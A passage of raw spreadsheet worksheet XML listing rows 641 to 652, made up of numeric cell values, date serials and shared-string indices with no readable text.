      <c r="AM641" t="s">
        <v>5072</v>
      </c>
      <c r="AN641" t="s">
        <v>68</v>
      </c>
      <c r="AO641">
        <v>2015</v>
      </c>
      <c r="AP641">
        <v>81341544452</v>
      </c>
      <c r="AQ641">
        <v>81341544452</v>
      </c>
      <c r="AR641" t="s">
        <v>5073</v>
      </c>
      <c r="AU641">
        <v>0</v>
      </c>
      <c r="AV641">
        <v>0</v>
      </c>
      <c r="AW641">
        <v>0</v>
      </c>
      <c r="AX641">
        <v>0</v>
      </c>
      <c r="AY641">
        <v>11</v>
      </c>
      <c r="AZ641">
        <v>7</v>
      </c>
      <c r="BA641" t="s">
        <v>17174</v>
      </c>
      <c r="BB641">
        <v>0</v>
      </c>
      <c r="BC641">
        <v>0</v>
      </c>
      <c r="BD641" t="s">
        <v>10164</v>
      </c>
    </row>
    <row r="642" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A642">
        <v>2347</v>
      </c>
      <c r="B642" t="s">
        <v>5074</v>
      </c>
      <c r="C642" t="s">
        <v>189</v>
      </c>
      <c r="D642" t="s">
        <v>4899</v>
      </c>
      <c r="E642" t="s">
        <v>300</v>
      </c>
      <c r="F642" t="s">
        <v>5075</v>
      </c>
      <c r="G642" s="1">
        <v>43867</v>
      </c>
      <c r="H642">
        <v>964</v>
      </c>
      <c r="I642">
        <v>964</v>
      </c>
      <c r="J642">
        <v>1</v>
      </c>
      <c r="K642">
        <v>0</v>
      </c>
      <c r="L642">
        <v>1</v>
      </c>
      <c r="M642">
        <v>0</v>
      </c>
      <c r="N642">
        <v>0</v>
      </c>
      <c r="O642">
        <v>0</v>
      </c>
      <c r="P642">
        <v>0</v>
      </c>
      <c r="Q642">
        <v>3</v>
      </c>
      <c r="R642">
        <v>3</v>
      </c>
      <c r="S642">
        <v>1</v>
      </c>
      <c r="T642">
        <v>0</v>
      </c>
      <c r="U642">
        <v>1000</v>
      </c>
      <c r="V642">
        <v>0</v>
      </c>
      <c r="W642">
        <v>25</v>
      </c>
      <c r="X642">
        <v>0</v>
      </c>
      <c r="Y642">
        <v>0</v>
      </c>
      <c r="Z642">
        <v>0</v>
      </c>
      <c r="AA642">
        <v>0</v>
      </c>
      <c r="AB642">
        <v>10</v>
      </c>
      <c r="AC642">
        <v>500</v>
      </c>
      <c r="AD642">
        <v>1</v>
      </c>
      <c r="AE642">
        <v>0</v>
      </c>
      <c r="AF642" t="s">
        <v>5076</v>
      </c>
      <c r="AG642">
        <v>0</v>
      </c>
      <c r="AH642">
        <v>31</v>
      </c>
      <c r="AJ642">
        <v>461</v>
      </c>
      <c r="AK642" t="s">
        <v>1566</v>
      </c>
      <c r="AL642" t="s">
        <v>1567</v>
      </c>
      <c r="AM642" t="s">
        <v>5077</v>
      </c>
      <c r="AN642" t="s">
        <v>55</v>
      </c>
      <c r="AO642">
        <v>2018</v>
      </c>
      <c r="AP642">
        <v>8114315785</v>
      </c>
      <c r="AQ642" t="s">
        <v>5078</v>
      </c>
      <c r="AR642" t="s">
        <v>5076</v>
      </c>
      <c r="AS642" t="s">
        <v>71</v>
      </c>
      <c r="AT642" t="s">
        <v>58</v>
      </c>
      <c r="AU642">
        <v>6</v>
      </c>
      <c r="AV642">
        <v>0</v>
      </c>
      <c r="AW642">
        <v>0</v>
      </c>
      <c r="AX642">
        <v>1</v>
      </c>
      <c r="AY642">
        <v>17</v>
      </c>
      <c r="AZ642">
        <v>6</v>
      </c>
      <c r="BA642" t="s">
        <v>17145</v>
      </c>
      <c r="BB642" t="s">
        <v>15845</v>
      </c>
      <c r="BC642" t="s">
        <v>10003</v>
      </c>
      <c r="BD642" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="643" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A643">
        <v>2528</v>
      </c>
      <c r="B643" t="s">
        <v>5079</v>
      </c>
      <c r="C643" t="s">
        <v>60</v>
      </c>
      <c r="D643" t="s">
        <v>5080</v>
      </c>
      <c r="E643" t="s">
        <v>142</v>
      </c>
      <c r="F643" t="s">
        <v>5081</v>
      </c>
      <c r="G643" s="1">
        <v>43889</v>
      </c>
      <c r="H643">
        <v>983</v>
      </c>
      <c r="I643">
        <v>983</v>
      </c>
      <c r="J643">
        <v>1</v>
      </c>
      <c r="K643">
        <v>0</v>
      </c>
      <c r="L643">
        <v>0</v>
      </c>
      <c r="M643">
        <v>0</v>
      </c>
      <c r="N643">
        <v>0</v>
      </c>
      <c r="O643">
        <v>0</v>
      </c>
      <c r="P643">
        <v>0</v>
      </c>
      <c r="Q643">
        <v>0</v>
      </c>
      <c r="R643">
        <v>0</v>
      </c>
      <c r="S643">
        <v>0</v>
      </c>
      <c r="T643">
        <v>0</v>
      </c>
      <c r="U643">
        <v>200000</v>
      </c>
      <c r="V643">
        <v>0</v>
      </c>
      <c r="W643">
        <v>0</v>
      </c>
      <c r="X643">
        <v>0</v>
      </c>
      <c r="Y643">
        <v>0</v>
      </c>
      <c r="Z643">
        <v>0</v>
      </c>
      <c r="AA643">
        <v>0</v>
      </c>
      <c r="AB643">
        <v>0</v>
      </c>
      <c r="AC643">
        <v>0</v>
      </c>
      <c r="AD643">
        <v>0</v>
      </c>
      <c r="AE643">
        <v>0</v>
      </c>
      <c r="AF643" t="s">
        <v>5082</v>
      </c>
      <c r="AG643">
        <v>35375</v>
      </c>
      <c r="AH643">
        <v>10</v>
      </c>
      <c r="AJ643">
        <v>135</v>
      </c>
      <c r="AK643" t="s">
        <v>3989</v>
      </c>
      <c r="AL643" t="s">
        <v>5083</v>
      </c>
      <c r="AM643" t="s">
        <v>5084</v>
      </c>
      <c r="AN643" t="s">
        <v>55</v>
      </c>
      <c r="AO643">
        <v>2017</v>
      </c>
      <c r="AP643">
        <v>82113318313</v>
      </c>
      <c r="AQ643" t="s">
        <v>5085</v>
      </c>
      <c r="AR643" t="s">
        <v>5082</v>
      </c>
      <c r="AU643">
        <v>21</v>
      </c>
      <c r="AV643">
        <v>1</v>
      </c>
      <c r="AW643">
        <v>4</v>
      </c>
      <c r="AX643">
        <v>0</v>
      </c>
      <c r="AY643">
        <v>4</v>
      </c>
      <c r="AZ643">
        <v>0</v>
      </c>
      <c r="BA643" t="s">
        <v>17154</v>
      </c>
      <c r="BB643">
        <v>0</v>
      </c>
      <c r="BC643" t="s">
        <v>10085</v>
      </c>
      <c r="BD643">
        <v>0</v>
      </c>
    </row>
    <row r="644" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A644">
        <v>2569</v>
      </c>
      <c r="B644" t="s">
        <v>5086</v>
      </c>
      <c r="C644" t="s">
        <v>129</v>
      </c>
      <c r="D644" t="s">
        <v>5087</v>
      </c>
      <c r="E644" t="s">
        <v>49</v>
      </c>
      <c r="F644" t="s">
        <v>1016</v>
      </c>
      <c r="G644" s="1">
        <v>43873</v>
      </c>
      <c r="H644">
        <v>1021</v>
      </c>
      <c r="I644">
        <v>1021</v>
      </c>
      <c r="J644">
        <v>0</v>
      </c>
      <c r="K644">
        <v>1</v>
      </c>
      <c r="L644">
        <v>0</v>
      </c>
      <c r="M644">
        <v>0</v>
      </c>
      <c r="N644">
        <v>0</v>
      </c>
      <c r="O644">
        <v>0</v>
      </c>
      <c r="P644">
        <v>0</v>
      </c>
      <c r="Q644">
        <v>4</v>
      </c>
      <c r="R644">
        <v>1</v>
      </c>
      <c r="S644">
        <v>0</v>
      </c>
      <c r="T644">
        <v>0</v>
      </c>
      <c r="U644">
        <v>0</v>
      </c>
      <c r="V644">
        <v>1500</v>
      </c>
      <c r="W644">
        <v>0</v>
      </c>
      <c r="X644">
        <v>0</v>
      </c>
      <c r="Y644">
        <v>0</v>
      </c>
      <c r="Z644">
        <v>0</v>
      </c>
      <c r="AA644">
        <v>0</v>
      </c>
      <c r="AB644">
        <v>1000</v>
      </c>
      <c r="AC644">
        <v>10000</v>
      </c>
      <c r="AD644">
        <v>0</v>
      </c>
      <c r="AE644">
        <v>0</v>
      </c>
      <c r="AF644" t="s">
        <v>5088</v>
      </c>
      <c r="AG644">
        <v>15570</v>
      </c>
      <c r="AH644">
        <v>11</v>
      </c>
      <c r="AJ644">
        <v>268</v>
      </c>
      <c r="AK644" t="s">
        <v>5089</v>
      </c>
      <c r="AL644" t="s">
        <v>5090</v>
      </c>
      <c r="AM644" t="s">
        <v>5091</v>
      </c>
      <c r="AN644" t="s">
        <v>68</v>
      </c>
      <c r="AO644">
        <v>0</v>
      </c>
      <c r="AP644">
        <v>85257191499</v>
      </c>
      <c r="AQ644" t="s">
        <v>5092</v>
      </c>
      <c r="AR644" t="s">
        <v>5093</v>
      </c>
      <c r="AS644" t="s">
        <v>71</v>
      </c>
      <c r="AT644" t="s">
        <v>72</v>
      </c>
      <c r="AU644">
        <v>1</v>
      </c>
      <c r="AV644">
        <v>1</v>
      </c>
      <c r="AW644">
        <v>17</v>
      </c>
      <c r="AX644">
        <v>65</v>
      </c>
      <c r="AY644">
        <v>11</v>
      </c>
      <c r="AZ644">
        <v>50</v>
      </c>
      <c r="BA644" t="s">
        <v>16644</v>
      </c>
      <c r="BB644">
        <v>0</v>
      </c>
      <c r="BC644" t="s">
        <v>10024</v>
      </c>
      <c r="BD644">
        <v>0</v>
      </c>
    </row>
    <row r="645" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A645">
        <v>2573</v>
      </c>
      <c r="B645" t="s">
        <v>5094</v>
      </c>
      <c r="C645" t="s">
        <v>99</v>
      </c>
      <c r="D645" t="s">
        <v>5095</v>
      </c>
      <c r="E645" t="s">
        <v>142</v>
      </c>
      <c r="F645" t="s">
        <v>5096</v>
      </c>
      <c r="G645" s="1">
        <v>44103</v>
      </c>
      <c r="H645">
        <v>1033</v>
      </c>
      <c r="I645">
        <v>1033</v>
      </c>
      <c r="J645">
        <v>1</v>
      </c>
      <c r="K645">
        <v>0</v>
      </c>
      <c r="L645">
        <v>0</v>
      </c>
      <c r="M645">
        <v>0</v>
      </c>
      <c r="N645">
        <v>0</v>
      </c>
      <c r="O645">
        <v>0</v>
      </c>
      <c r="P645">
        <v>0</v>
      </c>
      <c r="Q645">
        <v>0</v>
      </c>
      <c r="R645">
        <v>0</v>
      </c>
      <c r="S645">
        <v>0</v>
      </c>
      <c r="T645">
        <v>0</v>
      </c>
      <c r="U645">
        <v>150000</v>
      </c>
      <c r="V645">
        <v>0</v>
      </c>
      <c r="W645">
        <v>0</v>
      </c>
      <c r="X645">
        <v>0</v>
      </c>
      <c r="Y645">
        <v>0</v>
      </c>
      <c r="Z645">
        <v>0</v>
      </c>
      <c r="AA645">
        <v>0</v>
      </c>
      <c r="AB645">
        <v>0</v>
      </c>
      <c r="AC645">
        <v>0</v>
      </c>
      <c r="AD645">
        <v>0</v>
      </c>
      <c r="AE645">
        <v>0</v>
      </c>
      <c r="AF645" t="s">
        <v>5097</v>
      </c>
      <c r="AG645">
        <v>14440</v>
      </c>
      <c r="AH645">
        <v>12</v>
      </c>
      <c r="AJ645">
        <v>160</v>
      </c>
      <c r="AK645" t="s">
        <v>114</v>
      </c>
      <c r="AL645" t="s">
        <v>114</v>
      </c>
      <c r="AM645" t="s">
        <v>5098</v>
      </c>
      <c r="AN645" t="s">
        <v>68</v>
      </c>
      <c r="AO645">
        <v>2012</v>
      </c>
      <c r="AP645" t="s">
        <v>4440</v>
      </c>
      <c r="AQ645" t="s">
        <v>5099</v>
      </c>
      <c r="AR645" t="s">
        <v>5097</v>
      </c>
      <c r="AS645" t="s">
        <v>71</v>
      </c>
      <c r="AT645" t="s">
        <v>72</v>
      </c>
      <c r="AU645">
        <v>25</v>
      </c>
      <c r="AV645">
        <v>2</v>
      </c>
      <c r="AW645">
        <v>7</v>
      </c>
      <c r="AX645">
        <v>0</v>
      </c>
      <c r="AY645">
        <v>3</v>
      </c>
      <c r="AZ645">
        <v>3</v>
      </c>
      <c r="BA645" t="s">
        <v>16986</v>
      </c>
      <c r="BB645" t="s">
        <v>15860</v>
      </c>
      <c r="BC645" t="s">
        <v>10051</v>
      </c>
      <c r="BD645" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="646" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A646">
        <v>2155</v>
      </c>
      <c r="B646" t="s">
        <v>5100</v>
      </c>
      <c r="C646" t="s">
        <v>318</v>
      </c>
      <c r="D646" t="s">
        <v>5101</v>
      </c>
      <c r="E646" t="s">
        <v>111</v>
      </c>
      <c r="F646" t="s">
        <v>5102</v>
      </c>
      <c r="G646" s="1">
        <v>44280</v>
      </c>
      <c r="H646">
        <v>1041</v>
      </c>
      <c r="I646">
        <v>1041</v>
      </c>
      <c r="J646">
        <v>2</v>
      </c>
      <c r="K646">
        <v>0</v>
      </c>
      <c r="L646">
        <v>1</v>
      </c>
      <c r="M646">
        <v>0</v>
      </c>
      <c r="N646">
        <v>0</v>
      </c>
      <c r="O646">
        <v>0</v>
      </c>
      <c r="P646">
        <v>0</v>
      </c>
      <c r="Q646">
        <v>3</v>
      </c>
      <c r="R646">
        <v>6</v>
      </c>
      <c r="S646">
        <v>0</v>
      </c>
      <c r="T646">
        <v>1</v>
      </c>
      <c r="U646">
        <v>50000</v>
      </c>
      <c r="V646">
        <v>0</v>
      </c>
      <c r="W646">
        <v>5000</v>
      </c>
      <c r="X646">
        <v>0</v>
      </c>
      <c r="Y646">
        <v>0</v>
      </c>
      <c r="Z646">
        <v>0</v>
      </c>
      <c r="AA646">
        <v>0</v>
      </c>
      <c r="AB646">
        <v>100</v>
      </c>
      <c r="AC646">
        <v>60000</v>
      </c>
      <c r="AD646">
        <v>0</v>
      </c>
      <c r="AE646">
        <v>50000</v>
      </c>
      <c r="AF646" t="s">
        <v>5103</v>
      </c>
      <c r="AG646">
        <v>90212</v>
      </c>
      <c r="AH646">
        <v>26</v>
      </c>
      <c r="AJ646">
        <v>420</v>
      </c>
      <c r="AK646" t="s">
        <v>5104</v>
      </c>
      <c r="AL646" t="s">
        <v>861</v>
      </c>
      <c r="AM646" t="s">
        <v>5105</v>
      </c>
      <c r="AN646" t="s">
        <v>55</v>
      </c>
      <c r="AO646">
        <v>1998</v>
      </c>
      <c r="AP646" t="s">
        <v>5106</v>
      </c>
      <c r="AQ646" t="s">
        <v>5107</v>
      </c>
      <c r="AR646" t="s">
        <v>5108</v>
      </c>
      <c r="AS646" t="s">
        <v>71</v>
      </c>
      <c r="AT646" t="s">
        <v>58</v>
      </c>
      <c r="AU646">
        <v>0</v>
      </c>
      <c r="AV646">
        <v>0</v>
      </c>
      <c r="AW646">
        <v>6</v>
      </c>
      <c r="AX646">
        <v>37</v>
      </c>
      <c r="AY646">
        <v>7</v>
      </c>
      <c r="AZ646">
        <v>2</v>
      </c>
      <c r="BA646" t="s">
        <v>17078</v>
      </c>
      <c r="BB646" t="s">
        <v>15156</v>
      </c>
      <c r="BC646">
        <v>0</v>
      </c>
      <c r="BD646" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="647" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A647">
        <v>2561</v>
      </c>
      <c r="B647" t="s">
        <v>5109</v>
      </c>
      <c r="C647" t="s">
        <v>318</v>
      </c>
      <c r="D647" t="s">
        <v>5110</v>
      </c>
      <c r="E647" t="s">
        <v>49</v>
      </c>
      <c r="F647" t="s">
        <v>364</v>
      </c>
      <c r="G647" s="1">
        <v>43860</v>
      </c>
      <c r="H647">
        <v>1055</v>
      </c>
      <c r="I647">
        <v>1055</v>
      </c>
      <c r="J647">
        <v>0</v>
      </c>
      <c r="K647">
        <v>0</v>
      </c>
      <c r="L647">
        <v>0</v>
      </c>
      <c r="M647">
        <v>0</v>
      </c>
      <c r="N647">
        <v>0</v>
      </c>
      <c r="O647">
        <v>0</v>
      </c>
      <c r="P647">
        <v>0</v>
      </c>
      <c r="Q647">
        <v>0</v>
      </c>
      <c r="R647">
        <v>0</v>
      </c>
      <c r="S647">
        <v>0</v>
      </c>
      <c r="T647">
        <v>1</v>
      </c>
      <c r="U647">
        <v>0</v>
      </c>
      <c r="V647">
        <v>0</v>
      </c>
      <c r="W647">
        <v>0</v>
      </c>
      <c r="X647">
        <v>0</v>
      </c>
      <c r="Y647">
        <v>0</v>
      </c>
      <c r="Z647">
        <v>0</v>
      </c>
      <c r="AA647">
        <v>0</v>
      </c>
      <c r="AB647">
        <v>0</v>
      </c>
      <c r="AC647">
        <v>0</v>
      </c>
      <c r="AD647">
        <v>0</v>
      </c>
      <c r="AE647">
        <v>500000</v>
      </c>
      <c r="AF647" t="s">
        <v>5111</v>
      </c>
      <c r="AG647">
        <v>90245</v>
      </c>
      <c r="AH647">
        <v>26</v>
      </c>
      <c r="AJ647">
        <v>420</v>
      </c>
      <c r="AK647" t="s">
        <v>936</v>
      </c>
      <c r="AL647" t="s">
        <v>5112</v>
      </c>
      <c r="AM647" t="s">
        <v>5113</v>
      </c>
      <c r="AN647" t="s">
        <v>55</v>
      </c>
      <c r="AO647">
        <v>2019</v>
      </c>
      <c r="AP647">
        <v>82349064872</v>
      </c>
      <c r="AQ647" t="s">
        <v>5114</v>
      </c>
      <c r="AR647" t="s">
        <v>5111</v>
      </c>
      <c r="AS647" t="s">
        <v>371</v>
      </c>
      <c r="AT647" t="s">
        <v>86</v>
      </c>
      <c r="AU647">
        <v>25</v>
      </c>
      <c r="AV647">
        <v>1</v>
      </c>
      <c r="AW647">
        <v>3</v>
      </c>
      <c r="AX647">
        <v>7</v>
      </c>
      <c r="AY647">
        <v>3</v>
      </c>
      <c r="AZ647">
        <v>1</v>
      </c>
      <c r="BA647" t="s">
        <v>17176</v>
      </c>
      <c r="BB647" t="s">
        <v>15865</v>
      </c>
      <c r="BC647" t="s">
        <v>9506</v>
      </c>
      <c r="BD647" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="648" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A648">
        <v>2579</v>
      </c>
      <c r="B648" t="s">
        <v>5115</v>
      </c>
      <c r="C648" t="s">
        <v>99</v>
      </c>
      <c r="D648" t="s">
        <v>5116</v>
      </c>
      <c r="E648" t="s">
        <v>142</v>
      </c>
      <c r="F648" t="s">
        <v>5117</v>
      </c>
      <c r="G648" s="1">
        <v>44106</v>
      </c>
      <c r="H648">
        <v>1064</v>
      </c>
      <c r="I648">
        <v>1064</v>
      </c>
      <c r="J648">
        <v>2</v>
      </c>
      <c r="K648">
        <v>0</v>
      </c>
      <c r="L648">
        <v>2</v>
      </c>
      <c r="M648">
        <v>0</v>
      </c>
      <c r="N648">
        <v>0</v>
      </c>
      <c r="O648">
        <v>0</v>
      </c>
      <c r="P648">
        <v>0</v>
      </c>
      <c r="Q648">
        <v>0</v>
      </c>
      <c r="R648">
        <v>0</v>
      </c>
      <c r="S648">
        <v>1</v>
      </c>
      <c r="T648">
        <v>0</v>
      </c>
      <c r="U648">
        <v>3000</v>
      </c>
      <c r="V648">
        <v>0</v>
      </c>
      <c r="W648">
        <v>500</v>
      </c>
      <c r="X648">
        <v>0</v>
      </c>
      <c r="Y648">
        <v>0</v>
      </c>
      <c r="Z648">
        <v>0</v>
      </c>
      <c r="AA648">
        <v>0</v>
      </c>
      <c r="AB648">
        <v>0</v>
      </c>
      <c r="AC648">
        <v>0</v>
      </c>
      <c r="AD648">
        <v>1</v>
      </c>
      <c r="AE648">
        <v>0</v>
      </c>
      <c r="AF648" t="s">
        <v>357</v>
      </c>
      <c r="AG648">
        <v>14440</v>
      </c>
      <c r="AH648">
        <v>12</v>
      </c>
      <c r="AJ648">
        <v>160</v>
      </c>
      <c r="AK648" t="s">
        <v>114</v>
      </c>
      <c r="AL648" t="s">
        <v>114</v>
      </c>
      <c r="AM648" t="s">
        <v>5118</v>
      </c>
      <c r="AN648" t="s">
        <v>55</v>
      </c>
      <c r="AO648">
        <v>2019</v>
      </c>
      <c r="AP648">
        <v>216670065</v>
      </c>
      <c r="AQ648" t="s">
        <v>5119</v>
      </c>
      <c r="AR648" t="s">
        <v>357</v>
      </c>
      <c r="AS648" t="s">
        <v>71</v>
      </c>
      <c r="AT648" t="s">
        <v>58</v>
      </c>
      <c r="AU648">
        <v>26</v>
      </c>
      <c r="AV648">
        <v>0</v>
      </c>
      <c r="AW648">
        <v>20</v>
      </c>
      <c r="AX648">
        <v>2</v>
      </c>
      <c r="AY648">
        <v>2</v>
      </c>
      <c r="AZ648">
        <v>4</v>
      </c>
      <c r="BA648" t="s">
        <v>17188</v>
      </c>
      <c r="BB648" t="s">
        <v>15864</v>
      </c>
      <c r="BC648">
        <v>0</v>
      </c>
      <c r="BD648" t="s">
        <v>10040</v>
      </c>
    </row>
    <row r="649" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A649">
        <v>2578</v>
      </c>
      <c r="B649" t="s">
        <v>5120</v>
      </c>
      <c r="C649" t="s">
        <v>3165</v>
      </c>
      <c r="D649" t="s">
        <v>5121</v>
      </c>
      <c r="E649" t="s">
        <v>142</v>
      </c>
      <c r="F649" t="s">
        <v>5122</v>
      </c>
      <c r="G649" s="1">
        <v>44351</v>
      </c>
      <c r="H649">
        <v>1082</v>
      </c>
      <c r="I649">
        <v>1082</v>
      </c>
      <c r="J649">
        <v>0</v>
      </c>
      <c r="K649">
        <v>1</v>
      </c>
      <c r="L649">
        <v>2</v>
      </c>
      <c r="M649">
        <v>2</v>
      </c>
      <c r="N649">
        <v>0</v>
      </c>
      <c r="O649">
        <v>0</v>
      </c>
      <c r="P649">
        <v>0</v>
      </c>
      <c r="Q649">
        <v>2</v>
      </c>
      <c r="R649">
        <v>12</v>
      </c>
      <c r="S649">
        <v>1</v>
      </c>
      <c r="T649">
        <v>1</v>
      </c>
      <c r="U649">
        <v>0</v>
      </c>
      <c r="V649">
        <v>1</v>
      </c>
      <c r="W649">
        <v>4000</v>
      </c>
      <c r="X649">
        <v>2000</v>
      </c>
      <c r="Y649">
        <v>0</v>
      </c>
      <c r="Z649">
        <v>0</v>
      </c>
      <c r="AA649">
        <v>0</v>
      </c>
      <c r="AB649">
        <v>700</v>
      </c>
      <c r="AC649">
        <v>3000</v>
      </c>
      <c r="AD649">
        <v>1</v>
      </c>
      <c r="AE649">
        <v>120000</v>
      </c>
      <c r="AF649" t="s">
        <v>5123</v>
      </c>
      <c r="AG649">
        <v>99910</v>
      </c>
      <c r="AH649">
        <v>34</v>
      </c>
      <c r="AJ649">
        <v>494</v>
      </c>
      <c r="AK649" t="s">
        <v>5124</v>
      </c>
      <c r="AL649" t="s">
        <v>5125</v>
      </c>
      <c r="AM649" t="s">
        <v>5126</v>
      </c>
      <c r="AN649" t="s">
        <v>55</v>
      </c>
      <c r="AO649">
        <v>2019</v>
      </c>
      <c r="AP649">
        <v>81383106717</v>
      </c>
      <c r="AQ649" t="s">
        <v>5127</v>
      </c>
      <c r="AR649" t="s">
        <v>5128</v>
      </c>
      <c r="AS649" t="s">
        <v>71</v>
      </c>
      <c r="AT649" t="s">
        <v>58</v>
      </c>
      <c r="AU649">
        <v>27</v>
      </c>
      <c r="AV649">
        <v>1</v>
      </c>
      <c r="AW649">
        <v>0</v>
      </c>
      <c r="AX649">
        <v>0</v>
      </c>
      <c r="AY649">
        <v>12</v>
      </c>
      <c r="AZ649">
        <v>6</v>
      </c>
      <c r="BA649" t="s">
        <v>17187</v>
      </c>
      <c r="BB649" t="s">
        <v>17194</v>
      </c>
      <c r="BC649" t="s">
        <v>9550</v>
      </c>
      <c r="BD649">
        <v>0</v>
      </c>
    </row>
    <row r="650" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A650">
        <v>2337</v>
      </c>
      <c r="B650" t="s">
        <v>5129</v>
      </c>
      <c r="C650" t="s">
        <v>99</v>
      </c>
      <c r="D650" t="s">
        <v>5130</v>
      </c>
      <c r="E650" t="s">
        <v>111</v>
      </c>
      <c r="F650" t="s">
        <v>5131</v>
      </c>
      <c r="G650" s="1">
        <v>44011</v>
      </c>
      <c r="H650">
        <v>1105</v>
      </c>
      <c r="I650">
        <v>1105</v>
      </c>
      <c r="J650">
        <v>2</v>
      </c>
      <c r="K650">
        <v>0</v>
      </c>
      <c r="L650">
        <v>2</v>
      </c>
      <c r="M650">
        <v>0</v>
      </c>
      <c r="N650">
        <v>0</v>
      </c>
      <c r="O650">
        <v>0</v>
      </c>
      <c r="P650">
        <v>0</v>
      </c>
      <c r="Q650">
        <v>1</v>
      </c>
      <c r="R650">
        <v>0</v>
      </c>
      <c r="S650">
        <v>0</v>
      </c>
      <c r="T650">
        <v>0</v>
      </c>
      <c r="U650">
        <v>600000</v>
      </c>
      <c r="V650">
        <v>0</v>
      </c>
      <c r="W650">
        <v>200000</v>
      </c>
      <c r="X650">
        <v>0</v>
      </c>
      <c r="Y650">
        <v>0</v>
      </c>
      <c r="Z650">
        <v>0</v>
      </c>
      <c r="AA650">
        <v>0</v>
      </c>
      <c r="AB650">
        <v>10</v>
      </c>
      <c r="AC650">
        <v>0</v>
      </c>
      <c r="AD650">
        <v>0</v>
      </c>
      <c r="AE650">
        <v>0</v>
      </c>
      <c r="AF650" t="s">
        <v>5132</v>
      </c>
      <c r="AG650">
        <v>14440</v>
      </c>
      <c r="AH650">
        <v>12</v>
      </c>
      <c r="AJ650">
        <v>160</v>
      </c>
      <c r="AK650" t="s">
        <v>114</v>
      </c>
      <c r="AL650" t="s">
        <v>114</v>
      </c>
      <c r="AM650" t="s">
        <v>5133</v>
      </c>
      <c r="AN650" t="s">
        <v>82</v>
      </c>
      <c r="AO650">
        <v>1994</v>
      </c>
      <c r="AP650" t="s">
        <v>5134</v>
      </c>
      <c r="AQ650" t="s">
        <v>5135</v>
      </c>
      <c r="AR650" t="s">
        <v>5132</v>
      </c>
      <c r="AS650" t="s">
        <v>71</v>
      </c>
      <c r="AT650" t="s">
        <v>86</v>
      </c>
      <c r="AU650">
        <v>26</v>
      </c>
      <c r="AV650">
        <v>0</v>
      </c>
      <c r="AW650">
        <v>34</v>
      </c>
      <c r="AX650">
        <v>17</v>
      </c>
      <c r="AY650">
        <v>7</v>
      </c>
      <c r="AZ650">
        <v>2</v>
      </c>
      <c r="BA650" t="s">
        <v>17195</v>
      </c>
      <c r="BB650">
        <v>0</v>
      </c>
      <c r="BC650">
        <v>0</v>
      </c>
      <c r="BD650" t="s">
        <v>10058</v>
      </c>
    </row>
    <row r="651" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A651">
        <v>2562</v>
      </c>
      <c r="B651" t="s">
        <v>4285</v>
      </c>
      <c r="C651" t="s">
        <v>168</v>
      </c>
      <c r="D651" t="s">
        <v>5136</v>
      </c>
      <c r="E651" t="s">
        <v>1394</v>
      </c>
      <c r="F651" t="s">
        <v>5137</v>
      </c>
      <c r="G651" s="1">
        <v>43956</v>
      </c>
      <c r="H651">
        <v>1115</v>
      </c>
      <c r="I651">
        <v>1115</v>
      </c>
      <c r="J651">
        <v>4</v>
      </c>
      <c r="K651">
        <v>0</v>
      </c>
      <c r="L651">
        <v>6</v>
      </c>
      <c r="M651">
        <v>9</v>
      </c>
      <c r="N651">
        <v>0</v>
      </c>
      <c r="O651">
        <v>0</v>
      </c>
      <c r="P651">
        <v>0</v>
      </c>
      <c r="Q651">
        <v>0</v>
      </c>
      <c r="R651">
        <v>0</v>
      </c>
      <c r="S651">
        <v>2</v>
      </c>
      <c r="T651">
        <v>1</v>
      </c>
      <c r="U651">
        <v>1500</v>
      </c>
      <c r="V651">
        <v>0</v>
      </c>
      <c r="W651">
        <v>3600</v>
      </c>
      <c r="X651">
        <v>1350</v>
      </c>
      <c r="Y651">
        <v>0</v>
      </c>
      <c r="Z651">
        <v>0</v>
      </c>
      <c r="AA651">
        <v>0</v>
      </c>
      <c r="AB651">
        <v>0</v>
      </c>
      <c r="AC651">
        <v>0</v>
      </c>
      <c r="AD651">
        <v>4000</v>
      </c>
      <c r="AE651">
        <v>40000</v>
      </c>
      <c r="AF651" t="s">
        <v>5138</v>
      </c>
      <c r="AG651">
        <v>17550</v>
      </c>
      <c r="AH651">
        <v>13</v>
      </c>
      <c r="AJ651">
        <v>176</v>
      </c>
      <c r="AK651" t="s">
        <v>1180</v>
      </c>
      <c r="AL651" t="s">
        <v>5139</v>
      </c>
      <c r="AM651" t="s">
        <v>5140</v>
      </c>
      <c r="AN651" t="s">
        <v>82</v>
      </c>
      <c r="AO651">
        <v>2009</v>
      </c>
      <c r="AP651" t="s">
        <v>5141</v>
      </c>
      <c r="AQ651" t="s">
        <v>5142</v>
      </c>
      <c r="AR651" t="s">
        <v>5143</v>
      </c>
      <c r="AU651">
        <v>26</v>
      </c>
      <c r="AV651">
        <v>3</v>
      </c>
      <c r="AW651">
        <v>555</v>
      </c>
      <c r="AX651">
        <v>476</v>
      </c>
      <c r="AY651">
        <v>144</v>
      </c>
      <c r="AZ651">
        <v>129</v>
      </c>
      <c r="BA651" t="s">
        <v>16638</v>
      </c>
      <c r="BB651" t="s">
        <v>15861</v>
      </c>
      <c r="BC651" t="s">
        <v>10806</v>
      </c>
      <c r="BD651" t="s">
        <v>10132</v>
      </c>
    </row>
    <row r="652" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A652">
        <v>2600</v>
      </c>
      <c r="B652" t="s">
        <v>4419</v>
      </c>
      <c r="C652" t="s">
        <v>74</v>
      </c>
      <c r="D652" t="s">
        <v>5144</v>
      </c>
      <c r="E652" t="s">
        <v>300</v>
      </c>
      <c r="F652" t="s">
        <v>5145</v>
      </c>
      <c r="G652" s="1">
        <v>44299</v>
      </c>
      <c r="H652">
        <v>1141</v>
      </c>
      <c r="I652">
        <v>1141</v>
      </c>
      <c r="J652">
        <v>2</v>
      </c>
      <c r="K652">
        <v>0</v>
      </c>
      <c r="L652">
        <v>1</v>
      </c>
      <c r="M652">
        <v>2</v>
      </c>
      <c r="N652">
        <v>4000</v>
      </c>
